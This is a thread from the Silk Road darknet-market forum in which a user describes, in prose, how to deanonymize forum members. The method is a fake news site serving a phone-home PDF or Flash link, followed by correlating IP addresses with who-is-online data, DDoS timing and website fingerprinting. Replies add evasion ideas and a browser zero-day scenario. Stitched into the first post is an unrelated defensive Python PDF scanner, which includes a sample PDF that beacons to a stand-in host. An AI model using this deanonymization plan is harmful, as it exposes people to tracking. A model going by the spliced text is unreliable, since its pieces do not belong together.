Silk Road forums

Discussion => Security => Topic started by: kmfkewm on May 23, 2012, 02:24 am

Title: two simple ways I could probably covertly get several of your IP addresses
Post by: kmfkewm on May 23, 2012, 02:24 am
A. Make a fake website that looks like a news website of some sort. I could just spider out a legitimate website and change the branding, and register a legit-sounding domain name. The news article will be relevant to SR and will link to yet another URL that claims to have a .pdf that has leaked with information on SR. The PDF will phone home as soon as it is opened, and give a list of all of the IP addresses of those who opened it without proper countermeasures. The entire time I will be running a script to check the who-is-online section of the forum and who all has visited the thread versus the non-Tor IP addresses seen downloading the PDF. Any found IP address can immediately be narrowed to the crowd size of users who viewed the thread. I could also attempt various strategies to narrow further on who the IP address belongs to; perhaps I could DDOS it on a few occasions while monitoring who is online and see if I can cause a pattern in knocking someone off of SR (this will be even easier to do if they happen to visit the SILC channel). Perhaps I can monitor if you continually browsed SR after viewing that thread or if you had a pause that is consistent with someone switching their focus to the news article and downloading and reading the fake PDF. The timing between when you view the thread and when you open the PDF will also be useful for narrowing in on you. Perhaps you are a vendor and I know where you ship from, and I can geoposition all of the non-Tor IP addresses well enough to leave you as the only suspect ;).

B. Do the same thing as above but using a link to a flash video.

The moral of the story is: make sure you protect yourself from these simple proxy bypass attacks. I am willing to bet that at least some people here open PDFs without having a fully isolated OS, or being behind a transparent proxy, or opening it in a restricted VM, or having proper firewall rules or access controls. I also imagine several have Flash enabled. I could probably also do the news thing and a lot of people would probably in fact visit the article without even using Tor; I have seen several people here indicate that they use a different browser that isn't behind Tor to open clearnet links that they find on SR.

edit: Hm, actually this would work better against a private forum, since anonymous viewing is allowed here. That would make this attack less easy to carry out but not impossible; it would introduce some noise but probably wouldn't make it impossible to deanonymize at least some of the people who open the PDF (they would just need to be logged in when they go to the thread, although just intel on IP addresses could be useful if coupled with knowledge of vendors' shipping locations). If I owned the SR server I could do some additional things as well: if any real IP addresses visit the news site I could compare their browser fingerprint to the browser fingerprints of SR users and attempt to further narrow the crowds based on this or find a correlation. I could also very quickly link IP addresses to pseudonyms with the DDOS / who-is-online monitoring technique, since I would quickly be able to see if any latency patterns arise in pseudonymous users' streams after I DDOS the suspect IP address.

Ohhh, I could also do that new remote website fingerprinting attack against the identified IP addresses over a long period of time, and compare the times they are detected as browsing the SR forum to the who-is-online list and intersect the resulting crowds. That would probably be the best technique to link an IP address to its SR pseudonym. Of course you would need to not be taking proper countermeasures with PDFs first... but I bet that is true for many of you.
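The attack above relies on the reader opening a PDF that carries an automatic action with an outbound fetch. The script below is an added example for the defender's side, not code from this thread or from any of its posters: it triages a PDF on disk without rendering it, looking for the name objects that can trigger actions automatically (/OpenAction, /AA) and those that can reach out to the network or the host (/URI, /SubmitForm, /JavaScript, /Launch, and so on), in the spirit of Didier Stevens' pdfid tool. Both PDFs it scans are constructed inline for the demo; the beacon URL and the sample structure are assumptions, not artefacts from any real document. It also resolves the #XX hex escapes that PDF permits inside names, since /#55RI is the same name as /URI and a naive string match would miss it.

```python
import re

# Constructed sample: a minimal PDF whose /OpenAction fires a URI fetch on open.
# Hand-written for this demo; the hostname is a placeholder, not a real beacon.
PHONE_HOME_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /URI /URI (http://tracker.example.invalid/beacon) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: a plain one-page document with no actions at all.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >> endobj
4 0 obj << /Length 44 >> stream
BT /F1 12 Tf 72 720 Td (Hello, world) Tj ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# PDF name objects worth flagging, split by what they enable.
AUTO_TRIGGER = {
    b"/OpenAction": "action runs automatically when the document opens",
    b"/AA": "additional actions bound to page or field events",
}
OUTBOUND = {
    b"/URI": "fetches a URI (the classic phone-home beacon)",
    b"/SubmitForm": "posts form data to a remote server",
    b"/GoToR": "opens a remote file",
    b"/ImportData": "imports data from an external file",
    b"/JavaScript": "embedded JavaScript (can call submitForm and friends)",
    b"/JS": "embedded JavaScript",
    b"/Launch": "launches an external program",
    b"/RichMedia": "embedded Flash or other rich media",
}
INDICATORS = {**AUTO_TRIGGER, **OUTBOUND}

# A PDF name ends at whitespace, a delimiter character, or end of data.
NAME_END = rb"(?=[\s/\[\]<>(){}%]|\Z)"


def normalize_names(data: bytes) -> bytes:
    """Resolve #XX hex escapes so an obfuscated /Open#41ction reads as /OpenAction.
    Applied to the whole file, so binary streams may gain spurious bytes; that
    only matters for matching, never for the file on disk."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Return {indicator: occurrence count} for every flagged name in the PDF."""
    normalized = normalize_names(data)
    found = {}
    for name in INDICATORS:
        count = len(re.findall(re.escape(name) + NAME_END, normalized))
        if count:
            found[name.decode()] = count
    return found


def extract_uris(data: bytes) -> list:
    """List literal-string /URI targets so the analyst can see them without fetching them."""
    normalized = normalize_names(data)
    return [m.decode("latin-1")
            for m in re.findall(rb"/URI\s*\(([^)]*)\)", normalized)]


def phone_home_risk(data: bytes) -> bool:
    """Heuristic: an automatic trigger combined with any outbound-capable action.
    A bare /URI in a link annotation still needs a click, so it is reported by
    scan_pdf but does not on its own count as phone-home risk here."""
    found = scan_pdf(data)
    auto = any(n.decode() in found for n in AUTO_TRIGGER)
    outbound = any(n.decode() in found for n in OUTBOUND)
    return auto and outbound


def report(label: str, data: bytes) -> None:
    """Human-readable summary for one document."""
    print(f"== {label}: phone-home risk = {phone_home_risk(data)}")
    for name, count in scan_pdf(data).items():
        print(f"   {name} x{count}: {INDICATORS[name.encode()]}")
    for uri in extract_uris(data):
        print(f"   target: {uri}")


if __name__ == "__main__":
    report("constructed beacon PDF", PHONE_HOME_PDF)
    report("constructed benign PDF", BENIGN_PDF)
    # Same beacon with the action name hex-escaped; normalization still catches it.
    report("hex-escaped beacon PDF",
           PHONE_HOME_PDF.replace(b"/OpenAction", b"/Open#41ction"))
```

Run it against a suspicious download with `scan_pdf(open(path, "rb").read())` on a machine that will never open the file in a viewer; a hit on `phone_home_risk` is reason enough to discard the document, and the `/URI` targets are for the report, not for visiting. This is string-level triage only: it does not decompress object streams or FlateDecode'd content, so a clean result is not proof of safety, which is why the OP's structural countermeasures (isolated VM, transparent proxy, firewall rules) still matter.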
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: hyruleantoker on May 23, 2012, 04:55 am
I'll be the first to say... Das fucked up.
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: novocaine on May 23, 2012, 05:03 am
I will be the first to say thank you once again.
Personally I never ever open links from SR, even via Tor (overkill).
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: peesh on May 23, 2012, 04:03 pm
don't open any fucking pdfs
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: opi8 on May 23, 2012, 04:36 pm
Been checking out the OVDB, some good shit in that section when you take the time to read into some of those threads

Saw some of your posts in there OP whilst reading

Some of it is pretty fucking detailed down that end of the board!!
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: aciddeath on May 24, 2012, 02:36 am
so do it with malevolence
and raise awareness
harden the security culture of the community
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: marsvolta12 on May 24, 2012, 05:51 am
The entire time I will be running a script to check the who is online section of the forum and who all has visited the thread versus the non Tor IP addresses seen downloading the PDF

Please excuse my ignorance. I honestly know very little about the inner workings of hidden services (would SR be considered to be a hidden service? Hidden services require 10 or more nodes from end to end, no?). Wouldn't all this information be useless if they applied an anonymizer/tumbler to thread views?

Honestly dude, I really don't know what I'm talking about, but would love to learn.
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: klaw239 on May 24, 2012, 06:05 am
If someone was using a laptop and every time they accessed SR they went war driving and found an open network, making sure all information coming from their computer was properly encrypted and their MAC masked, what then?
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: kmfkewm on May 24, 2012, 06:30 am
If someone was using a laptop and every time they accessed SR they went war driving and found an open network, making sure all information coming from their computer was properly encrypted and their MAC masked, what then?

Then this attack wouldn't work, but it would still be possible to pwn them if an attacker with enough skills wanted to try. It would probably require a lot of resources though. Maybe exploit a browser zero-day vulnerability and then geoposition with WPS; if you can control the police you could try and have them get to the target before their session ends. Not saying that it would be easy at all, but it would be firmly in the realm of possibility.
Title: Re: two simple ways I could probably covertly get several of your IP addresses
Post by: vlad1m1r on May 24, 2012, 04:35 pm
A. Make a fake website that looks like a news website of some sort. I could just spider out a legitimate website and change the branding, and register a legit-sounding domain name. The news article will be relevant to SR and will link to yet another URL that claims to have a .pdf that has leaked with information on SR. The PDF will phone home as soon as it is opened, and give a list of all of the IP addresses of those who opened it without proper countermeasures. The entire time I will be running a script to check the who-is-online section of the forum and who all has visited the thread versus the non-Tor IP addresses seen downloading the PDF. Any found IP address can immediately be narrowed to the crowd size of users who viewed the thread. I could also attempt various strategies to narrow further on who the IP address belongs to; perhaps I could DDOS it on a few occasions while monitoring who is online and see if I can cause a pattern in knocking someone off of SR (this will be even easier to do if they happen to visit the SILC channel). Perhaps I can monitor if you continually browsed SR after viewing that thread or if you had a pause that is consistent with someone switching their focus to the news article and downloading and reading the fake PDF. The timing between when you view the thread and when you open the PDF will also be useful for narrowing in on you. Perhaps you are a vendor and I know where you ship from, and I can geoposition all of the non-Tor IP addresses well enough to leave you as the only suspect ;).

B. Do the same thing as above but using a link to a flash video.

The moral of the story is: make sure you protect yourself from these simple proxy bypass attacks. I am willing to bet that at least some people here open PDFs without having a fully isolated OS, or being behind a transparent proxy, or opening it in a restricted VM, or having proper firewall rules or access controls. I also imagine several have Flash enabled. I could probably also do the news thing and a lot of people would probably in fact visit the article without even using Tor; I have seen several people here indicate that they use a different browser that isn't behind Tor to open clearnet links that they find on SR.

edit: Hm, actually this would work better against a private forum, since anonymous viewing is allowed here. That would make this attack less easy to carry out but not impossible; it would introduce some noise but probably wouldn't make it impossible to deanonymize at least some of the people who open the PDF (they would just need to be logged in when they go to the thread, although just intel on IP addresses could be useful if coupled with knowledge of vendors' shipping locations). If I owned the SR server I could do some additional things as well: if any real IP addresses visit the news site I could compare their browser fingerprint to the browser fingerprints of SR users and attempt to further narrow the crowds based on this or find a correlation. I could also very quickly link IP addresses to pseudonyms with the DDOS / who-is-online monitoring technique, since I would quickly be able to see if any latency patterns arise in pseudonymous users' streams after I DDOS the suspect IP address.

Ohhh, I could also do that new remote website fingerprinting attack against the identified IP addresses over a long period of time, and compare the times they are detected as browsing the SR forum to the who-is-online list and intersect the resulting crowds. That would probably be the best technique to link an IP address to its SR pseudonym. Of course you would need to not be taking proper countermeasures with PDFs first... but I bet that is true for many of you.

Thanks for this - I like to upload books here occasionally and use the ePub format rather than PDF because of JavaScript exploits.

V.